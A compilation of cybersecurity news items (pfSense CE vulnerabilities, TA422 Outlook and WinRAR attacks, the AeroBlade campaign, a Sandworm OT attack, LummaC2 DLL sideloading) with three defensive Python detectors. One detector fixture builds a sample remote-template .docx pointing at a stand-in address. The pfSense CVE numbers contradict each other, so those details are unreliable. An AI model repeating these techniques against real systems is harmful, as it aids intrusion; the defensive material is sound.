New findings in cybersecurity research have brought to light a severe vulnerability affecting more than 1,450 pfSense servers. This flaw puts them at risk of potential remote code execution (RCE) attacks, resulting from a combination of command injection and cross-site scripting weaknesses. This poses a substantial threat to the security of these extensively utilized network appliances.
Key Findings and Concerns:
Vulnerabilities in pfSense CE: The vulnerabilities were identified in pfSense CE (Community Edition) version 2.7.0. Researchers discovered two critical flaws that, when exploited in tandem, could lead to remote code execution attacks, allowing attackers to gain control over the affected systems.
Dual Vulnerabilities Identified (CVE-2023-42325, CVE-2023-42327): The research uncovered two distinct but related vulnerabilities in pfSense CE 2.7.0. These include a command injection flaw and a cross-site scripting (XSS) vulnerability. When exploited in combination, these vulnerabilities can lead to remote code execution (RCE) attacks.
Command Injection Flaw (CVE-2023-42326): The command injection vulnerability allows an attacker to execute arbitrary commands on the system. This type of vulnerability is particularly dangerous as it can give attackers the same level of access to the system as the user running the vulnerable service.
Cross-Site Scripting (XSS) Vulnerability: The XSS vulnerability in pfSense CE can be exploited to run malicious scripts in the context of the user's browser session. This can lead to a variety of malicious activities, including stealing session cookies, which can compromise the user's session.
Remote Code Execution (RCE) Risk: The combination of these vulnerabilities creates a pathway for remote code execution. This means an attacker could potentially take full control of the pfSense device, leading to severe security breaches, including data theft, unauthorized network access, and disruption of services.
Exploitation Potential: The ease of exploitation of these vulnerabilities adds to the severity of the issue. Attackers with knowledge of these vulnerabilities can exploit them without needing sophisticated skills, making it a pressing concern for all pfSense CE users.
Patch Availability: Netgate, the company behind pfSense, has released patches to address these vulnerabilities. It is crucial for users and administrators to apply these updates as soon as possible to mitigate the risks associated with these security flaws.
Widespread Impact: Given the popularity of pfSense as a firewall and router solution, especially among small to medium-sized enterprises, the impact of these vulnerabilities is potentially widespread, affecting a large number of users and networks.
Exposure of pfSense Instances: Investigations have revealed that around 1,450 pfSense instances, accessible online, are vulnerable to the identified security flaws. This number indicates a substantial portion of the pfSense user base that could be at risk. The fact that these pfSense instances are exposed online exacerbates the risk. Being accessible over the internet makes them potential targets for remote attackers who can exploit the vulnerabilities without needing physical access to the network. The combination of command injection and cross-site scripting vulnerabilities in these instances creates a potential for remote code execution (RCE). This means that an attacker could remotely execute arbitrary code on the affected pfSense device, leading to complete system compromise.
Nature of the Security Flaws: The vulnerabilities involve dangerous command injection and cross-site scripting (XSS) flaws. These types of vulnerabilities are particularly alarming because they can be exploited to run malicious scripts or commands, leading to a full compromise of the server.
Patch Management Lag: Despite the availability of patches released by Netgate, the company behind pfSense, a significant number of instances remain unpatched and vulnerable. This delay in applying critical updates leaves these systems exposed to potential cyber attacks.
The Criticality of Timely Updates: This situation highlights the crucial importance of regular system updates and patch management in the realm of cybersecurity. Systems running outdated or unpatched software are often prime targets for cybercriminals looking to exploit known vulnerabilities.
Potential Impact of Exploitation: If these vulnerabilities are exploited, the consequences could be severe. They range from unauthorized access to sensitive data and disruption of network services to the potential for widespread malware infection.
Urgent Call to Action: Administrators and users of pfSense servers are strongly advised to update their systems to the latest version immediately. This action is necessary to mitigate these vulnerabilities and protect against potential exploitation by malicious actors.
The revelation of these vulnerabilities in pfSense servers serves as a stark reminder of the ever-present and evolving nature of cybersecurity threats. It underscores the need for constant vigilance, regular system updates, and robust security protocols to safeguard digital infrastructures.
Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative targets.
Outlook vulnerabilities offer:-
Access to sensitive emails
Access to sensitive information
WinRAR vulnerabilities provide an entry point to manipulate compressed files, potentially executing malicious code on a victim's system.
Cybersecurity researchers at Proofpoint recently discovered that the TA422 APT Group is actively exploiting the Outlook and WinRAR vulnerabilities to attack organizations.
Exploiting Of Patched Vulnerabilities
Since March 2023, Proofpoint found Russian APT TA422 using patched vulnerabilities to target Europe and North America. The TA422 APT group is linked to the following groups and tied to the Russian GRU by the US Intelligence Community:-
While engaging in typical targeted actions, TA422 showed an unexpected surge in emails exploiting CVE-2023-23397, a Microsoft Outlook vulnerability, sending over 10,000 emails to diverse sectors.
Besides this, the operators of the TA422 APT group also exploited a WinRAR vulnerability, CVE-2023-38831, in their campaigns.
TA422 launched massive campaigns in March 2023, exploiting CVE-2023-23397 against targets in:-
Europe
North America
Earlier, they targeted Ukrainian entities in April 2022 using the same exploit. Proofpoint noticed a significant surge in activity, with over 10,000 attempts to exploit a Microsoft Outlook vulnerability during late summer 2023.
It's unclear whether this was a mistake or a deliberate effort to gather target credentials. TA422 re-targeted higher education and manufacturing users, suggesting these entities are priority targets.
In the late summer campaign, TA422 used an appointment attachment with a fake file extension, leading to an SMB listener on a compromised Ubiquiti router.
This router acted as an NTLM listener, recording inbound credential hashes without extensive network engagement when Outlook processed the attachment.
Proofpoint's tracking of Portugalmail addresses revealed more TA422 activity. In September 2023, TA422 exploited the WinRAR vulnerability CVE-2023-38831 in two campaigns, using different Portugalmail addresses and spoofing geopolitical entities.
Emails with BRICS Summit and European Parliament meeting subjects contained RAR attachments dropping a .cmd file.
The file modified proxy settings, downloaded a lure document, and connected to an IP-literal Responder server. The server, likely a compromised Fortigate FortiOS Firewall, initiated the NTLM credential exchange.
Between September and November 2023, Proofpoint tracked TA422 campaigns using Portugalmail and Mockbin for redirection.
Targeting government and defense sectors, TA422 employed Mockbin to lead victims to InfinityFree domains. After browser fingerprinting, victims were directed to InfinityFree, initiating a chain of activity.
Despite the exploitation of disclosed vulnerabilities like CVE-2023-23397 and CVE-2023-38831, TA422 persists, likely relying on unpatched systems for continued success.
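An added detection example, not from Proofpoint's report, that approaches the NTLM credential leak from the defender's side: it parses constructed firewall log lines, flags SMB connections from internal hosts to external addresses (the traffic an appointment attachment pointing at an attacker-controlled SMB listener produces when Outlook processes it), and lists the internal hosts whose users need a credential reset. The log layout, the internal ranges and the sample addresses are assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed firewall log lines (not real telemetry). The key=value layout is
# an assumption of this example; 203.0.113.77 and 198.51.100.9 are
# documentation addresses standing in for attacker-controlled listeners.
SAMPLE_LOGS = [
    "2023-09-12T08:14:02Z action=allow proto=tcp src=10.20.30.41:51822 dst=10.20.30.5:445",
    "2023-09-12T08:14:09Z action=allow proto=tcp src=10.20.30.41:51830 dst=203.0.113.77:445",
    "2023-09-12T08:14:10Z action=allow proto=tcp src=10.20.30.41:51831 dst=203.0.113.77:139",
    "2023-09-12T08:15:00Z action=allow proto=tcp src=10.20.30.88:49221 dst=198.51.100.9:445",
    "2023-09-12T08:15:30Z action=allow proto=tcp src=10.20.30.41:51900 dst=142.250.74.46:443",
    "2023-09-12T08:16:00Z action=deny proto=tcp src=10.20.30.12:50001 dst=203.0.113.77:445",
]

# Address space the organisation treats as internal (assumption; extend with
# your own public ranges and trusted partner networks).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]
SMB_PORTS = {445, 139}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+action=(?P<action>\w+)\s+proto=(?P<proto>\w+)\s+"
    r"src=(?P<src>[\d.]+):(?P<sport>\d+)\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Dict[str, str]:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()


def find_smb_egress(lines: List[str]) -> List[Dict[str, str]]:
    """Return every SMB connection attempt from an internal host to an external
    address, allowed or denied. Denied attempts still tell you which hosts
    processed the lure and which listener they were steered towards."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec["proto"] != "tcp" or int(rec["dport"]) not in SMB_PORTS:
            continue
        if is_external(rec["src"]) or not is_external(rec["dst"]):
            continue
        findings.append(rec)
    return findings


def credentials_at_risk(findings: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Map each internal host that actually reached an external SMB listener
    (action=allow) to the listeners it contacted. The users logged on to those
    hosts must be assumed to have leaked an NTLM credential hash and need a
    password reset; a blocked attempt leaks nothing."""
    exposed: Dict[str, Set[str]] = defaultdict(set)
    for rec in findings:
        if rec["action"] == "allow":
            exposed[rec["src"]].add(rec["dst"])
    return dict(exposed)


if __name__ == "__main__":
    hits = find_smb_egress(SAMPLE_LOGS)
    for rec in hits:
        print(f"{rec['ts']} {rec['action']:5} {rec['src']} -> {rec['dst']}:{rec['dport']}")
    print("hosts needing credential reset:", credentials_at_risk(hits))
```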
An American aerospace company has been the target of a cyberespionage campaign dubbed AeroBlade, which appears to be aimed at both competitive and commercial cyberespionage.
The threat actor used spear-phishing as its distribution mechanism.
A weaponized document that was delivered as an email attachment reportedly has a malicious VBA macro code embedded in it as well as a remote template injection mechanism to provide the next stage of the payload execution, according to the BlackBerry Threat Research and Intelligence team.
AeroBlade Execution Chain
The network infrastructure and weaponization of the attacker appear to have gone active around September 2022, based on the evidence.
Researchers estimate with medium to high confidence that the attack's offensive phase took place in July 2023. The network infrastructure stayed the same during that period, but the attacker's toolset grew, making it stealthier.
There were two campaigns found, and there were a few similarities between them, such as:
Both lure documents were named "[redacted].docx."
The final payload is a reverse shell.
The command-and-control (C2) server IP address is the same.
There were a few differences between the two campaigns, such as:
The final payload of the attack is stealthier and uses more obfuscation and anti-analysis techniques.
The campaign's final payload includes an option to list directories from infected victims.
A targeted email containing a malicious document attachment with the filename [redacted].docx is the first sign of an infection.
When the document is opened, it shows text in a purposefully jumbled font and a "lure" message requesting that the potential victim click on it to activate the content in Microsoft Office.
The next-stage information is saved in an XML (eXtensible Markup Language) file inside a .dotm file. A .dotm file is a Microsoft Word document template that contains the default layout, settings, and macros for a document.
When the victim manually clicks the "Enable Content" lure message and opens the file, the [redacted].dotm document drops a new file to the system and opens it.
"The newly downloaded document is readable, leading the victim to believe that the file initially received by email is legitimate. In fact, it's a classic cyber bait-and-switch, performed invisibly right under the victim's nose", researchers said.
The final stage of execution is an executable file run on the system via the macro. The final payload is a DLL that connects to a hard-coded C2 server and functions as a reverse shell. Through a reverse shell, attackers can force the target to open communication back to them and gain full control of the target machine over the open port.
Based on the content of the lure message, an American aerospace organization was the target of both campaigns. The goal was probably to gain insight into the target's internal resources in order to assess its vulnerability to a potential ransom demand.
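The remote template injection described above can be spotted before a document is ever opened. This added example (not BlackBerry's tooling) builds a constructed minimal .docx whose settings part points at an external template, then scans the package's relationship files for attachedTemplate relationships with TargetMode="External" and checks for an embedded VBA project; the template URL is a documentation address.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = OFFICE_REL + "/attachedTemplate"
HYPERLINK = OFFICE_REL + "/hyperlink"


def build_sample_docx(template_url: Optional[str], with_macro: bool = False) -> bytes:
    """Constructed minimal .docx containing only the parts the scanner inspects.
    It is not a complete Word file, and the VBA part is a placeholder blob."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    template_ref = '<w:attachedTemplate r:id="rId1"/>' if template_url else ""
    settings = f'<w:settings xmlns:w="{w_ns}" xmlns:r="{OFFICE_REL}">{template_ref}</w:settings>'
    rel = (
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="External"/>'
        if template_url else ""
    )
    rels = f'<Relationships xmlns="{REL_NS}">{rel}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"/>')
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
        if with_macro:
            z.writestr("word/vbaProject.bin", b"placeholder, not a real VBA project")
    return buf.getvalue()


def scan_docx(data: bytes) -> Dict[str, object]:
    """Flag remote template references and macro projects in a .docx/.dotm.
    Word fetches an external attachedTemplate target on open, which is the
    remote template injection step; a template can in turn carry the macro."""
    remote_templates: List[str] = []
    other_external: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        for name in names:
            if not name.endswith(".rels"):
                continue
            # Untrusted XML: use defusedxml instead of ElementTree in production.
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target, rtype = rel.get("Target", ""), rel.get("Type", "")
                if rtype == ATTACHED_TEMPLATE:
                    remote_templates.append(target)
                elif rtype != HYPERLINK and target.lower().startswith(("http://", "https://", "\\\\")):
                    other_external.append(target)  # e.g. remote OLE or image parts
    has_macros = "word/vbaProject.bin" in names
    return {
        "remote_templates": remote_templates,
        "other_external_parts": other_external,
        "has_macros": has_macros,
        "suspicious": bool(remote_templates) or has_macros,
    }


if __name__ == "__main__":
    print(scan_docx(build_sample_docx("http://203.0.113.5/template.dotm")))
    print(scan_docx(build_sample_docx(None)))
```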
In a recent and alarming development, the notorious Russia-linked threat actor Sandworm executed a sophisticated cyber-physical attack targeting a critical infrastructure organization in Ukraine.
The incident, responded to by cybersecurity firm Mandiant, unfolded as a multi-event assault, showcasing a novel technique to impact Industrial control systems (ICS) and operational technology (OT).
Unraveling Russia's Cyber-Physical Capabilities
The attack, spanning from June to October 2022, demonstrated a significant evolution in Russia's cyber-physical attack capabilities, notably visible since the invasion of Ukraine.
Sandworm, known for its allegiance to Russia's Main Intelligence Directorate (GRU), has historically focused on disruptive and destructive campaigns, particularly in Ukraine.
The unique aspect of this attack involved Sandworm's utilization of living-off-the-land (LotL) techniques at the OT level, initially causing an unplanned power outage in conjunction with missile strikes across Ukraine.
The threat actor further demonstrated its adaptability by deploying a new variant of the CADDYWIPER malware in the victim's IT environment.
Mandiant's analysis revealed the complexity of the attack, highlighting Sandworm's ability to recognize novel OT threat vectors, develop new capabilities, and exploit various OT infrastructures.
The threat actor's deployment of LotL techniques indicated a streamlined approach, reducing the time and resources required for the cyber-physical assault.
Concerns Over Sandworm's Adaptive Capabilities
Despite being unable to pinpoint the initial intrusion point, Mandiant suggested that the OT component of the attack may have been developed in as little as two months.
This raises concerns about Sandworm's capability to rapidly adapt and deploy similar attacks against diverse OT systems worldwide.
Sandworm's global threat activity, coupled with its novel OT capabilities, prompted a call to action for OT asset owners worldwide.
Mandiant provided detailed guidance, including detection methods, hunting strategies, and recommendations for hardening systems against such threats.
The attack's timing, coinciding with Russian kinetic operations, suggested a strategic synchronization, indicating that the threat actor may have been waiting for a specific moment to deploy its capabilities.
As observed in this incident, the evolution of Sandworm's tactics offers insights into Russia's ongoing investment in OT-oriented offensive cyber capabilities.
In conclusion, this Sandworm attack serves as a stark reminder of the escalating cyber threats faced by critical infrastructure globally.
The continuous evolution of cyber adversaries necessitates a proactive approach from governments, organizations, and asset owners to secure and safeguard vital systems against such sophisticated attacks.
Hackers opt for DLL hijacking as a technique to exploit vulnerable applications because it allows them to load malicious code by tricking a legitimate application into loading a malicious DLL.
This can give them unauthorized access and control over a system or application, enabling various types of attacks like:-
Privilege escalation
Data theft
System compromise
An active threat involves an Infostealer distributing a legitimate EXE file alongside a hidden malicious DLL in the same directory.
The legitimate EXE runs the malicious DLL, a technique known as DLL hijacking, commonly used for malware distribution.
Malicious DLL With Legitimate EXE Files
Malware posing as software cracks is growing at a rapid pace and is getting distributed by the threat actors using DLL hijacking.
Users searching for cracked software are led to malicious sites, and the downloads are password-protected, encrypted RAR files.
Running the EXE infects the system, and these EXEs often carry valid signatures, so users should always be cautious with cracked software, the ASEC report reads.
The malicious DLLs are legitimate DLLs with a small part modified so that they decrypt and run data from a nearby file. Hiding the data this way avoids altering the DLL's appearance, reducing the risk of detection.
For malware to work, the following elements are required to be placed in the same folder:-
Data
EXE
Modified DLL
Unzipping the password-protected file with the password "2023" gives you the following files:-
The following two files are genuine VLC files with valid signatures:-
Setup.exe
libvlc.dll
"libvlccore.dll" is altered and lacks a matching signature; the extra directories, such as demux and lua, serve to mask its malicious nature.
Running "Setup.exe" loads "libvlccore.dll," triggering a modified function that reads and decrypts "ironwork.tiff" in the same folder. This file holds code disguised as a PNG.
It loads "pla.dll" from SysWow64 and injects code into its memory differently than typical malware. This method uses NTDLL relocation; for "cmd.exe," it loads "pla.dll" and injects the malware into it.
A data file is written to %TEMP%. cmd.exe inherits it and has its EntryPoint changed to "pla.dll" code. This code decrypts a file, generates the LummaC2 malware, and runs "explorer.exe," injecting and executing the binary.
LummaC2 targets victims and installs malware from its C2 server, and it steals various sensitive data using JSON-formatted responses from C2.
Because the malware runs through legitimate EXE files and DLLs that look like the originals, it poses a low risk of detection.
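An added triage example, not part of the ASEC report, for the staging layout described above: it constructs a directory mimicking the Setup.exe / libvlc.dll / libvlccore.dll / ironwork.tiff set and flags files whose magic bytes contradict their extension or that are high-entropy blobs sitting beside an EXE/DLL pair. The file contents are placeholders; Authenticode verification of the DLLs must be done on Windows and is out of scope here.

```python
import math
import os
import random
import tempfile
from collections import Counter
from typing import Dict, List

# Leading bytes expected for a few extensions (subset; an assumption).
EXPECTED_MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".tiff": [b"II*\x00", b"MM\x00*"],
    ".tif": [b"II*\x00", b"MM\x00*"],
    ".jpg": [b"\xff\xd8\xff"],
    ".exe": [b"MZ"],
    ".dll": [b"MZ"],
}
KNOWN_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png", b"II*\x00": "tiff", b"MM\x00*": "tiff",
    b"\xff\xd8\xff": "jpeg", b"MZ": "pe",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed payloads sit close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def sniff(head: bytes) -> str:
    for magic, kind in KNOWN_MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def triage_directory(path: str, entropy_threshold: float = 7.5) -> List[Dict[str, object]]:
    """Flag extension/magic mismatches and, when an EXE and a DLL share the
    directory (the sideloading precondition), any non-PE file that looks like
    an encrypted payload rather than real media or text."""
    files = sorted(n for n in os.listdir(path) if os.path.isfile(os.path.join(path, n)))
    exts = {os.path.splitext(n)[1].lower() for n in files}
    has_pe_pair = ".exe" in exts and ".dll" in exts
    findings: List[Dict[str, object]] = []
    for name in files:
        ext = os.path.splitext(name)[1].lower()
        with open(os.path.join(path, name), "rb") as f:
            data = f.read()
        reasons: List[str] = []
        expected = EXPECTED_MAGIC.get(ext)
        if expected and not any(data.startswith(m) for m in expected):
            reasons.append(f"magic_mismatch:{sniff(data[:8])}")
        if has_pe_pair and ext not in (".exe", ".dll") and shannon_entropy(data) >= entropy_threshold:
            reasons.append("high_entropy_blob_beside_pe")
        if reasons:
            findings.append({"file": name, "reasons": reasons})
    return findings


def build_sample_dir() -> str:
    """Constructed directory mimicking the layout in the report. The PE files are
    stubs with an MZ header only, and the .tiff is a PNG header over random bytes."""
    d = tempfile.mkdtemp(prefix="sideload_")
    rng = random.Random(2023)
    blob = bytes(rng.getrandbits(8) for _ in range(4096))
    stub_pe = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 200  # placeholder, not a real PE
    for name in ("Setup.exe", "libvlc.dll", "libvlccore.dll"):
        with open(os.path.join(d, name), "wb") as f:
            f.write(stub_pe)
    with open(os.path.join(d, "ironwork.tiff"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n" + blob)
    with open(os.path.join(d, "readme.txt"), "wb") as f:
        f.write(b"VLC media player\n" * 20)
    os.makedirs(os.path.join(d, "demux"))
    os.makedirs(os.path.join(d, "lua"))
    return d


if __name__ == "__main__":
    for finding in triage_directory(build_sample_dir()):
        print(finding)
```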